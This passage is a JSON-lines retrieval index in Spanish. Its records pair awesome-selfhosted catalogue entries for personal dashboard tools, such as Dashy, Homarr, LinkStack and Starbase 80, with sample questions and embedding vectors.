0.04042, -0.07554, 0.07555, 0.07196, -0.08137, -0.02631, 0.01259, -0.01713, -0.05872, 0.05794, 0.00608, -0.04466, -0.0441, -0.05716, -0.02383, -0.02333, -0.0649, -0.0709, -0.03002, -0.01077, 0.01416, 0.10955, -0.02527, 0.03874, 0.09893, -0.04744, 0.1151, 0.04939, -0.0821, -0.06698, 0.03084, -0.0288, -0.04743, 0.01632, 0.01396, 0.03629, -0.03659, 0.09677, 0.08593, 0.03784, 0.02719, 0.01745, -0.0145, 0.0104, -0.05993, 0.02664, 0.06236, -0.00547, 0.04936, -0.0184, 0.03919, -0.08448, -0.02754, 0.02297, -0.0399, 0.03511, 0.03308, -0.09154, 0.00739, -0.02187, -0.09928, 0.03389, -0.06479, 0.00909, 0.04339, 0.1363, 0.09652, -0.06133, 0.10469, 0.08195, -0.10264, 0.03441, 0.02998, 0.04432, -0.08279, 0.06207, -0.06795, -0.13961, -0.03078, 0.06916, 0.05025, -0.00174, -0.05589, -0.08016, -0.00059, -0.0039, 0.04081, -0.0534, 0.05794, -0.04961, -0.01523, -0.0026, -0.02602, -0.00459, -0.04976, -0.02843, -0.05042, -0.06536, 0.01052, 0.00295, -0.00248, -0.03246, 0.0951, 0.00877, 0.06874, 0.02644, 0.1377, 0.01965, 0.0091, 0.04783, 0.02222, 0.00895, -0.0408, 0.06673, 0.04914, 0.05016, 0.0074, 0.03961, -0.00475, -0.02236, 0.05062, -0.01825, -0.03273, 0.03183, 0.0137, 0.02922, -0.01145, -0.00129, -0.04491, -0.00302, -0.05018, -0.02095, -0.00908, 0.03239, -0.05965, -0.01132, -0.06428, -0.04945, 0.08309, 0.01898, -0.05255, -0.02145, 0.03422, -0.03069, 0.01936, -0.01517, -0.01332, -0.02636, 0.04866, 0.08891, -0.03035, 0.05298, 0.00377]} -{"tipo": "pregunta", "herramienta": "Personal Dashboards", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Personal Dashboards", "tema": "personal dashboards", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Personal Dashboards: Dashy β€” Feature-rich homepage for your homelab, with easy YAML configuration [MIT, Nodejs/Docker]. Glance β€” Highly customizable dashboard that puts all your feeds in one place [AGPL-3.0, Docker/Go]. gobookmarks β€” Landing page to display bookmarks stored in GitHub, GitLab or local Git [AGPL-3.0, Go/Docker]. Heimdall β€” Elegant solution to organise all your web applications [MIT, PHP]. Homarr β€” Sleek, modern dashboard with many integrations and web-based config [MIT, Docker/Nodejs]. Homepage by gethomepage β€” Highly customizable homepage (or startpage / application dashboard) with Docker and service API integrations [GPL-3.0, Docker/Nodejs]. Homepage by tomershvueli β€” Simple, standalone, self-hosted PHP page that is your window to your server and the web [MIT, PHP]. Homer β€” Dead simple static homepage to expose your server services, with an easy yaml configuration and connectivity check [Apache-2.0, Docker/K8S/Nodejs]. Hubleys β€” Personal dashboards to organize links for multiple users via a central yaml config [MIT, Docker].", "indexar": "con que puedo montar una pagina personal que agrupe mis enlaces y herramientas en un solo lugar?", "v": [0.05946, 0.15247, -0.14083, -0.14252, -0.09425, -0.08302, -0.04232, 0.02895, -0.10638, -0.1498, -0.04449, -0.00646, -0.00112, -0.05047, 0.15418, 0.07507, 0.07987, -0.07738, 0.0065, 0.02334, -0.08225, -0.01408, -0.06075, -0.02467, -0.08233, -0.14048, 0.16, -0.02821, -0.15727, 0.07194, -0.02124, 0.07245, -0.02187, -0.04653, 0.03377, -0.1351, 0.1107, 0.04743, 0.01871, -0.06407, -0.13189, -0.06615, -0.12095, 0.04839, -0.04735, 0.00557, -0.04081, -0.02604, 0.02745, 0.07714, 0.00111, -0.03402, -0.1491, -0.04654, -0.11961, -0.10156, 0.2617, -0.0691, 0.07305, 0.00327, -0.10021, 0.08088, -0.04182, 0.06991, 0.03466, 0.07936, -0.01156, -0.03671, -0.07944, 0.03132, -0.08961, -0.0627, -0.01238, -0.0429, -0.00298, 0.05009, 0.06529, 0.09843, 0.01631, 0.00948, 0.02113, 0.03477, 0.01529, 0.06886, -0.09647, -0.02005, 0.03474, -0.00035, -0.01458, -0.11539, 0.07023, 0.11111, -0.02355, -0.03944, -0.0581, -0.08697, 0.03518, 0.15268, 0.02902, -0.0665, 0.03191, 0.01785, 0.03549, 0.13443, 0.05311, 0.03355, 0.04272, 0.04185, 0.02207, -0.01129, 0.06675, 0.05386, -0.01621, -0.03153, -0.02947, -0.0272, -0.04991, 0.01798, 0.02029, -0.11338, -0.01643, -0.06102, -0.02327, -0.01148, -0.05383, 0.03327, 0.08453, 0.03776, 0.01447, -0.01451, 0.00257, 0.05342, -0.01127, -0.04626, 0.0476, -0.01503, -0.02394, -0.06939, 0.0337, -0.07453, 0.06809, -0.00913, -0.04871, -0.15473, 0.0161, -0.02394, -0.04711, -0.04577, -0.03057, 0.02948, 0.01924, 0.05416, -0.00552, 0.03956, -0.05059, -0.007, 0.0064, -0.02636, 0.02513, 0.0119, -0.01754, 0.00236, 0.02869, 0.00688, 0.01068, 0.0516, -0.03945, 0.06225, 0.04677, 0.03683, -0.04355, 0.07546, 0.0361, -0.03983, 0.05654, -0.05124, -0.05997, -0.00175, 0.03683, 0.04941, 0.00751, -0.02891, -0.01784, 0.03098, -0.02893, -0.04211, 0.06427, -0.02267, 0.04689, 0.05033, -0.05812, -0.02385, -0.06743, 0.04463, 0.01848, -0.01971, -0.05311, 0.03517, 0.003, -0.03902, 0.01582, -0.06214, 0.00236, 0.01233, -0.0434, -0.01908, -0.04269, 0.00086, 0.02582, 0.01253, 0.04694, -0.03552, 0.06336, -0.05949, -0.09841, -0.03618, 0.07082, -0.00546, -0.04215, 0.11557, 0.04463, 0.07171, 0.10161, -0.05061, -0.00263, 0.0651, -0.01951, -0.03794, 0.02676, 0.06622, -0.01517, -0.02081, -0.05034, -0.06295, 0.04849, 0.01895, 0.03296, 0.02937, -0.07059, 0.02101, 0.05633, 0.0523, 0.01054, -0.05916, -0.05102, -0.055, -0.07478, -0.001, 0.0248, -0.12502, -0.04645, -0.00665, 0.03334, -0.04047, 0.0488, -0.0414]} -{"tipo": "pregunta", "herramienta": "Personal Dashboards", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Personal Dashboards", "tema": "personal dashboards", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Personal Dashboards: Dashy β€” Feature-rich homepage for your homelab, with easy YAML configuration [MIT, Nodejs/Docker]. Glance β€” Highly customizable dashboard that puts all your feeds in one place [AGPL-3.0, Docker/Go]. gobookmarks β€” Landing page to display bookmarks stored in GitHub, GitLab or local Git [AGPL-3.0, Go/Docker]. Heimdall β€” Elegant solution to organise all your web applications [MIT, PHP]. Homarr β€” Sleek, modern dashboard with many integrations and web-based config [MIT, Docker/Nodejs]. Homepage by gethomepage β€” Highly customizable homepage (or startpage / application dashboard) with Docker and service API integrations [GPL-3.0, Docker/Nodejs]. Homepage by tomershvueli β€” Simple, standalone, self-hosted PHP page that is your window to your server and the web [MIT, PHP]. Homer β€” Dead simple static homepage to expose your server services, with an easy yaml configuration and connectivity check [Apache-2.0, Docker/K8S/Nodejs]. Hubleys β€” Personal dashboards to organize links for multiple users via a central yaml config [MIT, Docker].", "indexar": "cual es una alternativa libre a Dashy o Heimdall para gestionar el acceso a mis aplicaciones?", "v": [-0.18739, 0.12955, -0.00984, -0.16454, -0.03207, -0.01091, -0.1261, -0.00756, -0.14753, 0.08604, -0.04211, -0.23522, -0.10201, -0.00276, 0.10198, -0.0695, 0.13507, -0.11944, 0.02239, 0.00137, -0.11992, 0.15963, -0.1488, -0.00503, -0.10396, -0.05256, 0.09752, -0.01438, -0.11417, -0.067, 0.06341, -0.09493, 0.06323, -0.09439, -0.01155, 0.0237, 0.04846, 0.02562, 0.09833, -0.03699, -0.00979, -0.00071, -0.03462, 0.08775, 0.02875, -0.10802, 0.03811, -0.01424, -0.02773, 0.00233, -0.15008, -0.05191, -0.07467, 0.00026, 0.08959, -0.03666, 0.08844, -0.19187, 0.02307, -0.03441, -0.07074, 0.03911, 0.02445, 0.05888, 0.02884, -0.06213, -0.02923, 0.0998, -0.10868, 0.11425, 0.01913, 0.05156, 0.03918, 0.01872, -0.0376, 0.03097, -0.09586, 0.06083, 0.02952, -0.00395, 0.01541, -0.12182, -0.03561, 0.01574, 0.02325, -0.10029, 0.06116, -0.04036, 0.00318, -0.01002, 0.06493, -0.04505, -0.02379, -0.00162, -0.0222, -0.12713, 0.00775, 0.0303, 0.04245, 0.05595, -0.01213, 0.01811, -0.10883, 0.01417, -0.08464, 0.0231, 0.01251, -0.02534, -0.07933, -0.01904, -0.04889, -0.06, -0.03017, 0.07404, -0.01628, 0.04336, -0.0367, -0.02232, 0.03577, -0.05688, -0.08913, -0.10786, 0.03138, -0.07564, 0.06186, -0.01052, 0.11432, 0.04542, -0.06755, 0.08144, 0.05774, -0.0893, -0.07277, -0.02602, -0.06941, -0.02099, -0.02016, -0.07234, 0.04596, -0.03563, -0.00933, 0.08268, 0.0353, 0.00946, 0.08235, -0.04314, -0.031, 0.01499, 0.05298, -0.00527, 0.00239, -0.05077, -0.06122, 0.10693, -0.04647, 0.02861, -0.02481, -0.0414, -0.12366, 0.06696, -0.06033, -0.04115, -0.05365, -0.03684, -0.04965, -0.05138, 0.03992, 0.0225, -0.05551, 0.06173, -0.03046, 0.08542, 0.03615, -0.02672, 0.05025, -0.08248, 0.07395, -0.10287, 0.04149, -0.02975, -0.02385, -0.04396, -0.02153, -0.00521, -0.00827, -0.05934, -0.04261, 0.06783, -0.02068, 0.04619, -0.06852, 0.05322, -0.03438, -0.06338, 0.02794, -0.02746, 0.00068, -0.08094, -0.0612, 0.03505, -0.01738, -0.02606, -0.00343, 0.04725, 0.01936, 0.02467, -0.00508, 0.05881, 0.03652, 0.06657, 0.02355, 0.04588, 0.05129, 0.09887, -0.05673, -0.02557, 0.02463, -0.00283, 0.00355, -0.00738, 0.04079, 0.00035, -0.01734, -0.01457, -0.00149, 0.04141, 0.00416, 0.00191, -0.04317, -0.00274, 0.03426, -0.02821, -0.00658, 0.04268, 0.0283, -0.01115, 0.01722, -0.00679, -0.00452, -0.02861, 0.00822, 0.06172, 0.01725, -0.01039, -0.06486, 0.00573, -0.08349, 0.00645, -0.02755, -0.01176, -0.01825, 0.045, 0.03603, 0.02603, 0.03981, -0.00615]} -{"tipo": "pregunta", "herramienta": "Personal Dashboards", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Personal Dashboards", "tema": "personal dashboards", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Personal Dashboards: LinkStack β€” Link all your social media platforms easily accessible on one page, customizable through an intuitive, easy to use user/admin interface (alternative to Linktree and Manylink) [AGPL-3.0, PHP/Docker]. LittleLink β€” Simplistic approach for links in bio with 100+ branded buttons (alternative to Linktree) [MIT, Javascript]. Mafl β€” Minimalistic flexible homepage [MIT, Docker/Nodejs]. Nimbus β€” Modern drag-and-drop homelab dashboard with visual editor and simple configuration [AGPL-3.0, Docker]. Personal Management System β€” Organize the essentials of everyday life, everything from a simple to-do list, and notes up to payments, and schedules [MIT, Docker]. portkey β€” Simple web portal that serves as a startup page, displaying a compilation of links and URLs, while also allowing the addition of custom pages, all managed through a single configuration file [AGPL-3.0, Go/Docker]. ryot β€” Track various facets of your life - media, fitness, etc [GPL-3.0, Docker].", "indexar": "cual es una alternativa gratuita y de cΓ³digo abierto a Linktree para personalizar mis enlaces sociales?", "v": [0.03186, 0.08078, -0.10547, -0.13919, -0.03015, -0.16353, -0.05182, -0.02808, -0.16647, -0.12307, -0.00483, -0.21856, -0.00235, -0.13023, 0.11084, -0.09072, 0.14267, -0.08438, 0.13423, -0.00486, -0.01601, -0.00297, -0.17439, -0.13687, -0.06912, -0.16668, 0.05241, -0.05411, -0.11829, 0.05636, -0.0387, -0.01039, 0.06158, 0.05182, -0.02899, 0.1159, 0.17672, 0.13786, 0.05954, -0.09131, -0.00388, -0.02573, -0.07889, 0.10348, -0.13577, -0.04042, -0.00966, 0.06138, -0.02387, 0.02562, -0.11975, -0.04653, -0.13377, -0.0327, 0.00065, -0.05069, 0.1429, -0.08604, -0.1445, 0.05527, 0.00151, 0.04385, 0.0479, -0.03488, -0.01218, -0.07937, 0.0476, 0.07533, -0.074, 0.03754, -0.01403, 0.03079, -0.05716, -0.01789, -0.02785, 0.12202, -0.04828, -0.03334, 0.00659, 0.16929, -0.02618, -0.02479, 0.09647, -0.02938, -0.02766, 0.04797, 0.055, -0.04719, -0.03154, -0.07923, 0.07929, 0.02309, -0.05771, 0.06534, -0.09234, -0.03774, 0.00296, 0.03987, 0.0372, 0.05699, 0.02414, -0.03638, -0.03315, 0.03326, 0.08933, -0.01881, -0.04725, -0.01144, 0.03989, 0.03205, 0.03358, -0.06485, -0.00976, 0.00032, -0.03771, -0.02331, -0.07097, 0.01696, 0.02538, -0.09087, -0.10439, -0.00208, -0.10531, -0.018, -0.03853, 0.12209, 0.08195, 0.106, -0.03261, 0.01504, -0.05383, -0.04737, -0.03358, -0.07707, -0.0052, -0.02632, 0.05315, -0.06149, 0.0308, -0.01203, 0.00725, 0.01065, 0.05875, -0.00841, 0.02659, -0.02308, -0.00773, -0.0744, -0.08349, -0.05136, -0.04017, 0.07925, -0.03471, 0.02597, -0.01917, -0.01984, -0.08636, 0.00585, -0.00612, 0.06372, -0.01212, -0.01076, -0.01795, -0.0351, -0.013, 0.0327, 0.0469, -0.03043, 0.01258, 0.02475, 0.02653, 0.08056, 0.04652, -0.0312, 0.06772, -0.0808, 0.02345, -0.06404, -0.01378, -0.03212, -0.03124, 0.00765, 0.03757, -0.02587, -0.01316, -0.08478, -0.0045, 0.02945, 0.00146, 0.00037, -0.01857, -0.0399, -0.02377, 0.02124, 0.04904, -0.02253, 0.00232, -0.07178, -0.04618, -0.01922, -0.02539, 0.01614, 0.00241, -0.01514, -0.01643, 0.0261, 0.03117, 0.00615, -0.04621, 0.09003, 0.02557, -0.03335, 0.06328, 0.02989, -0.05671, 0.0194, 0.03116, -0.00683, 0.0812, 0.00346, 0.00588, 0.0136, 0.05007, -0.00809, 0.00665, 0.04499, -0.01126, 0.0532, -0.0699, 0.02243, 0.02626, -0.00425, -0.02912, -0.01337, 0.05905, 0.02277, 0.00951, 0.04172, -0.03908, -0.02156, 0.03882, 0.06649, -0.00998, 0.00281, -0.05922, -0.04081, -0.06293, -0.00789, 0.0087, -0.08131, -0.02199, 0.02281, -0.01281, -0.03842, 0.02287, 0.01794]} -{"tipo": "pregunta", "herramienta": "Personal Dashboards", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Personal Dashboards", "tema": "personal dashboards", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Personal Dashboards: LinkStack β€” Link all your social media platforms easily accessible on one page, customizable through an intuitive, easy to use user/admin interface (alternative to Linktree and Manylink) [AGPL-3.0, PHP/Docker]. LittleLink β€” Simplistic approach for links in bio with 100+ branded buttons (alternative to Linktree) [MIT, Javascript]. Mafl β€” Minimalistic flexible homepage [MIT, Docker/Nodejs]. Nimbus β€” Modern drag-and-drop homelab dashboard with visual editor and simple configuration [AGPL-3.0, Docker]. Personal Management System β€” Organize the essentials of everyday life, everything from a simple to-do list, and notes up to payments, and schedules [MIT, Docker]. portkey β€” Simple web portal that serves as a startup page, displaying a compilation of links and URLs, while also allowing the addition of custom pages, all managed through a single configuration file [AGPL-3.0, Go/Docker]. ryot β€” Track various facets of your life - media, fitness, etc [GPL-3.0, Docker].", "indexar": "necesito un panel de control simple en casa que me permita gestionar tareas, notas y pagos sin pagar licencias.", "v": [0.09925, 0.13599, -0.17564, -0.23111, -0.00982, -0.13281, 0.03907, -0.00079, -0.18518, -0.01983, -0.03062, -0.11674, 0.1032, -0.05042, -0.00345, 0.08871, 0.04154, 0.01277, 0.10287, 0.0776, -0.05274, -0.01273, -0.03874, -0.01397, -0.05568, 0.04275, 0.1649, -0.17406, -0.17409, 0.22955, -0.04615, -0.03799, 0.07254, -0.15728, -0.02447, 0.11183, -0.01907, 0.04591, 0.12189, -0.03088, 0.02258, 0.16477, -0.06024, 0.05429, 0.02097, -0.14374, 0.06541, 0.02388, 0.01196, -0.06168, -0.04351, -0.06014, -0.07603, -0.03617, -0.01319, -0.02819, 0.09918, -0.02341, 0.00358, -0.04961, -0.08572, 0.07436, 0.11279, 0.08114, -0.0583, 0.08779, 0.09695, 0.04566, 0.06316, 0.067, -0.01365, 0.02405, -0.00145, 0.01744, -0.05621, -0.08428, -0.03992, -0.13219, 0.03001, 0.00382, 0.02972, -0.01197, -0.13312, 0.01348, -0.0071, -0.02567, -0.05791, -0.07409, -0.00543, 0.03811, -0.02062, -0.03314, -0.01726, 0.02684, 0.01764, 0.04581, 0.02185, 0.07472, -0.00441, 0.0031, -0.01406, -0.00025, -0.01652, 0.04329, -0.01506, 0.12786, 0.07404, -0.03206, -0.04409, -0.01101, -0.05617, 0.09093, -0.00362, 0.02835, 0.00253, 0.05132, -0.02374, 0.01676, 0.01587, -0.00848, -0.00082, -0.06108, 0.08803, -0.02008, 0.08376, -0.11721, 0.1073, 0.13724, 0.03072, 0.03012, -0.01689, -0.05221, 0.04341, 0.03145, 0.07285, 0.07643, -0.02547, 0.00832, -0.09322, -0.04925, -0.00127, 0.13187, 0.0521, 0.00717, 0.10816, 0.03077, -0.09139, 0.00323, -0.09173, 0.04264, -0.00814, -0.03522, -0.04354, 0.00831, -0.00073, -0.01264, 0.02275, 0.02995, -0.02384, -0.00488, 0.01423, 0.03649, -0.03028, -0.02079, -0.0437, -0.01302, 0.02196, 0.08588, -0.03611, 0.03299, -0.02784, -0.00454, -0.03449, 0.00313, 0.07982, -0.08685, 0.05852, -0.09547, -0.01829, 0.00219, -0.00716, 0.03874, -0.02929, -0.0044, 0.00363, 0.08415, -0.03461, 0.08915, -0.00171, 0.0461, -0.00019, 0.00891, -0.0207, -0.05326, 0.02723, 0.01291, -0.06457, -0.02836, -0.04768, 0.0114, 0.0038, -0.01271, 0.02594, -0.01663, -0.01743, -0.00994, -0.00983, 0.10483, 0.06256, -0.00979, 0.00503, 0.01603, 0.01563, -0.00468, -0.01877, 0.02631, -0.03734, -0.01301, 0.00073, 0.05007, 0.09879, 0.01275, -0.02181, -0.02085, 0.07646, -0.0034, 0.00867, 0.0249, 0.00262, 0.00621, -0.02581, 0.04137, -0.03926, 0.01992, 0.0241, -0.03271, -0.02476, -0.02824, 0.00281, 0.03197, 0.00111, 0.05929, 0.04871, -0.00156, -0.05559, -0.01209, -0.05364, -0.02258, -0.05084, -0.00407, -0.00283, 0.0345, 0.01984, 0.05066, 0.01163, 0.0111]} -{"tipo": "pregunta", "herramienta": "Personal Dashboards", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Personal Dashboards", "tema": "personal dashboards", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Personal Dashboards: LinkStack β€” Link all your social media platforms easily accessible on one page, customizable through an intuitive, easy to use user/admin interface (alternative to Linktree and Manylink) [AGPL-3.0, PHP/Docker]. LittleLink β€” Simplistic approach for links in bio with 100+ branded buttons (alternative to Linktree) [MIT, Javascript]. Mafl β€” Minimalistic flexible homepage [MIT, Docker/Nodejs]. Nimbus β€” Modern drag-and-drop homelab dashboard with visual editor and simple configuration [AGPL-3.0, Docker]. Personal Management System β€” Organize the essentials of everyday life, everything from a simple to-do list, and notes up to payments, and schedules [MIT, Docker]. portkey β€” Simple web portal that serves as a startup page, displaying a compilation of links and URLs, while also allowing the addition of custom pages, all managed through a single configuration file [AGPL-3.0, Go/Docker]. ryot β€” Track various facets of your life - media, fitness, etc [GPL-3.0, Docker].", "indexar": "quΓ© herramienta sirve para crear una pΓ‘gina de presentaciΓ³n con botones personalizados que funcione sin servidor?", "v": [0.03657, 0.07684, -0.24888, -0.19338, 0.05068, -0.22189, 0.00114, -0.15087, -0.00786, -0.12108, -0.09085, -0.05378, 0.03764, -0.09846, 0.05442, 0.05763, 0.14628, -0.16009, 0.01131, 0.07929, -0.00222, 0.04778, -0.04407, -0.04472, -0.07569, -0.04177, 0.09932, -0.02844, -0.14745, 0.09569, 0.02253, -0.07542, 0.02192, -0.01652, 0.00504, -0.13917, -0.0704, 0.06152, -0.05558, 0.10291, 0.03463, 0.02244, -0.07878, 0.12565, -0.0624, 0.05259, 0.08583, -0.02539, 0.06258, 0.11168, -0.06729, -0.13612, -0.11507, 0.03156, -0.05359, -0.11217, 0.16301, -0.19036, 0.07239, -0.0753, -0.09739, 0.03311, -0.00443, -0.10673, 0.01354, -0.05911, -0.03784, -0.14527, 0.03623, 0.02649, -0.10107, -0.06102, 0.0151, -0.05136, 0.07854, 0.06675, -0.03711, 0.02971, 0.01784, 0.04689, 0.06418, 0.04007, -0.1014, 0.0287, -0.07837, -0.05693, 0.02129, 0.0295, 0.01487, -0.11116, 0.04007, 0.0465, -0.04745, 0.01899, -0.00074, -0.01482, 0.10478, -0.03344, 0.01875, -0.03343, 0.12061, -0.0178, -0.0597, 0.03661, -0.00041, 0.04748, 0.00752, -0.05903, 0.01188, 0.03435, 0.09194, -0.00481, -0.04695, -0.00124, -0.0629, 0.04603, -0.01691, 0.01253, 0.02832, 0.00172, -0.05854, -0.0147, -0.03014, -0.0286, -0.0151, -0.00413, -0.03992, 0.04304, -0.04984, -0.01043, 0.0472, -0.05823, -0.08777, 0.0183, 0.00425, 0.03663, 0.07706, -0.04169, -0.02745, -0.07499, 0.04186, 0.01766, -0.03008, -0.07984, 0.00908, -0.01958, 0.08085, -0.00178, -0.08039, 0.05498, 0.05618, -0.1155, -0.02476, 0.00422, -0.1143, -0.04555, -0.04142, 0.01559, -0.0464, 0.04175, -0.01683, -0.01447, 0.05188, 0.05628, 0.0256, -0.04029, -0.03403, 0.03964, 0.05529, 0.07558, -0.03091, 0.02771, 0.05574, -0.07522, 0.01987, -0.05212, -0.1022, 0.00949, 0.01841, -0.01943, -0.01775, -0.00885, -0.02805, -0.02734, -0.01978, -0.09827, -0.00086, -0.04368, -0.01779, 0.01167, 0.01349, 0.02893, -0.03097, 0.00242, 0.01984, -0.00656, 0.01916, -0.08826, 0.01968, -0.0279, 0.00513, -0.05586, 0.00228, -0.03495, 0.03376, 0.05151, -0.02034, -0.01963, 0.02794, 0.04073, 0.0138, -0.03773, 0.04915, 0.00691, 0.01046, -0.00386, 0.03875, -0.03191, -0.00484, -0.02789, 0.05189, -0.02061, -0.00171, 0.02239, 0.0465, 0.06444, 0.04663, -0.01723, 0.02665, -0.0007, -0.00753, -0.00755, -0.02588, -0.02364, 0.00565, -0.03572, 0.05238, -0.00747, -0.07934, -0.0632, -0.00777, 0.0767, -0.00477, -0.04647, -0.03551, -0.06453, -0.00999, -0.04412, -0.05926, -0.05522, -0.02667, -0.03751, 0.02415, -0.00905, -0.00155, -0.02881]} -{"tipo": "pregunta", "herramienta": "Personal Dashboards", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Personal Dashboards", "tema": "personal dashboards", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Personal Dashboards: Starbase 80 β€” A simple homepage with an iPad-style application grid, for mobile and desktop. One JSON configuration file [MIT, Docker]. Your Spotify β€” Allows you to record your Spotify listening activity and have statistics about them served through a Web application [⚠, MIT, Nodejs/Docker].", "indexar": "que programa puedo usar para crear un panel de control estilo iPad con una sola configuraciΓ³n JSON?", "v": [-0.07661, 0.02231, -0.21226, -0.22633, -0.06816, -0.18304, -0.02809, -0.08102, -0.06568, -0.05284, -0.10166, -0.13499, -0.00887, -0.10633, -0.07324, -0.02183, 0.12858, -0.07568, 0.02405, 0.02287, -0.04329, 0.03405, -0.06568, -0.13089, -0.00364, 0.17425, 0.04724, -0.02834, -0.07372, -0.02163, -0.09816, -0.0867, 0.08722, -0.03908, -0.12155, -0.07765, 0.096, 0.13916, -0.09934, 0.13802, 0.00325, -0.00097, 0.01578, 0.08331, 0.06858, 0.22841, 0.09078, 0.02757, -0.11937, 0.0951, -0.04082, -0.0057, -0.03328, 0.09137, 0.01024, -0.11213, 0.04384, -0.10847, -0.08624, 0.018, -0.03971, 0.01653, -0.02607, -0.01461, 0.02251, -0.02515, -0.0398, -0.04626, -0.03749, 0.05605, 0.08289, -0.10354, -0.03942, -0.02455, 0.08247, 0.02038, -0.02495, -0.041, 0.10133, -0.06336, -0.05558, 0.01698, -0.08048, 0.04333, -0.11435, 0.01104, -0.02973, -0.08027, -0.10419, -0.02006, -0.0416, -0.10747, 0.07074, -0.00218, -0.009, -0.07707, 0.0546, 0.0622, 0.01643, 0.04982, 0.07964, -0.04543, -0.02334, 0.16819, 0.00251, 0.00596, 0.10917, -0.06479, -0.01147, -0.01668, -0.03278, 0.05528, -0.02518, -0.0343, -0.06478, -0.02683, -0.07253, -0.05318, -0.02307, -0.04972, 0.01307, -0.00335, -0.00817, -0.03007, 0.12816, 0.0234, 0.04495, 0.0742, -0.08405, 0.06666, 0.00712, -0.06518, 0.0408, 0.01055, -0.06615, 0.0313, -0.04543, -0.00646, -0.01467, -0.01712, 0.02339, 0.09596, 0.01921, -0.03445, 0.04316, -0.10635, -0.02053, -0.03147, 0.00243, 0.07614, 0.02537, 0.04487, 0.06174, -0.02245, -0.05314, 0.00579, 0.03859, 0.0269, 0.003, 0.01214, -0.12646, 0.05127, -0.02842, 0.00823, 0.08875, -0.04866, -0.00461, 0.0067, 0.03806, 0.05097, -0.02341, 0.03702, 0.052, -0.0065, 0.01345, -0.02735, 0.03153, -0.02368, 0.03981, 0.01393, -0.042, -0.00414, -0.02036, 0.00871, 0.01565, -0.05755, -0.02503, 0.07586, -0.00955, 0.02776, -0.04273, 0.05784, 0.02081, -0.00235, 0.00207, 0.03643, 0.05414, 0.01205, -0.05114, -0.03086, -0.02605, -0.01838, 0.03093, -0.05745, 0.01277, 0.02688, -0.07982, 0.03087, 0.03244, 0.07744, 0.04672, -0.03307, 0.03296, -0.02483, -0.02192, 0.0226, -0.0369, 0.01422, 0.09365, -0.03596, 0.07807, -0.00982, -0.01967, 0.07101, 0.05284, -0.05696, -0.0255, -0.0047, -0.00727, 0.02647, -0.00147, 0.01123, 0.00839, -0.01206, -0.00103, -0.00881, 0.04608, -0.00822, -0.00695, 0.0031, -0.05692, 0.06066, 0.03585, -0.05254, -0.01491, -0.01058, -0.09821, 0.05998, -0.01908, -0.02247, -0.01149, 0.04118, 0.04158, -0.03196, -0.01171, 0.04612]} -{"tipo": "pregunta", "herramienta": "Personal Dashboards", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Personal Dashboards", "tema": "personal dashboards", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Personal Dashboards: Starbase 80 β€” A simple homepage with an iPad-style application grid, for mobile and desktop. One JSON configuration file [MIT, Docker]. Your Spotify β€” Allows you to record your Spotify listening activity and have statistics about them served through a Web application [⚠, MIT, Nodejs/Docker].", "indexar": "cual es una herramienta simple para registrar y visualizar estadΓ­sticas de mi actividad en Spotify?", "v": [0.04252, 0.10928, -0.16972, -0.22808, 0.05154, -0.19482, -0.13286, -0.1938, -0.03204, -0.02016, -0.02793, -0.07465, 0.00675, -0.11296, 0.11005, -0.00856, 0.08458, -0.12319, 0.00219, 0.05647, -0.03606, 0.00624, -0.02822, 0.07538, -0.01111, 0.00159, 0.1285, 0.01424, -0.19093, 0.09611, -0.02034, 0.01733, -0.02893, -0.07117, -0.06029, -0.05939, 0.00222, 0.04303, -0.0052, -0.04977, 0.04387, -0.04371, -0.00287, 0.03259, -0.02752, 0.03692, -0.06764, 0.00814, 0.05146, 0.0957, 0.05661, 0.00494, -0.08117, 0.00941, -0.01408, 0.0042, 0.0682, -0.22992, 0.04179, -0.14063, -0.04515, 0.02518, -0.10754, -0.03242, -0.0715, -0.0177, 0.10468, 0.00948, -0.03941, 0.108, 0.05972, 0.02706, -0.06509, -0.02779, 0.09686, 0.03978, 0.05423, -0.14375, 0.00287, -0.01274, 0.02604, -0.12794, -0.03224, 0.01746, -0.10453, -0.04907, 0.01636, -0.04115, 0.02088, 0.03562, -0.00968, 0.06667, -0.01745, 0.04714, 0.01908, 0.03144, 0.11388, -0.08037, -0.01196, -0.03276, 0.11329, 0.02996, -0.09071, 0.04963, 0.00382, -0.01571, -0.08565, -0.02304, -0.08083, 0.03338, 0.01205, -0.01015, -0.10003, 0.0014, -0.01002, 0.0849, -0.03174, -0.10565, 0.03439, -0.09547, 0.02574, 0.02558, -0.0466, -0.1103, -0.08022, 0.02129, -0.07016, 0.09339, 0.02442, -0.03322, 0.09364, -0.02593, -0.12139, -0.03273, 0.01385, -0.01224, -0.06404, -0.12559, 0.06475, 0.00813, 0.06883, 0.01818, -0.08289, -0.07349, 0.0832, -0.05756, 0.0511, -0.02295, -0.08909, 0.00039, -0.02767, 0.01096, -0.06501, 0.0164, 0.01832, 0.03166, 0.01148, -0.04746, -0.08465, -0.03116, -0.0101, -0.02478, 0.00935, -0.04555, 0.05826, -0.02901, 0.04515, -0.01897, 0.08982, -0.01446, -0.04619, 0.03578, 0.04733, -0.05646, -0.03134, -0.06405, -0.05835, -0.03639, 0.0339, -0.04219, -0.04893, 0.01977, 0.00303, -0.05235, 0.00333, -0.02513, 0.01027, -0.07322, -0.04017, 0.07117, 0.01903, 0.03516, 0.01789, -0.02019, 0.07719, 0.0156, -0.02374, -0.04895, 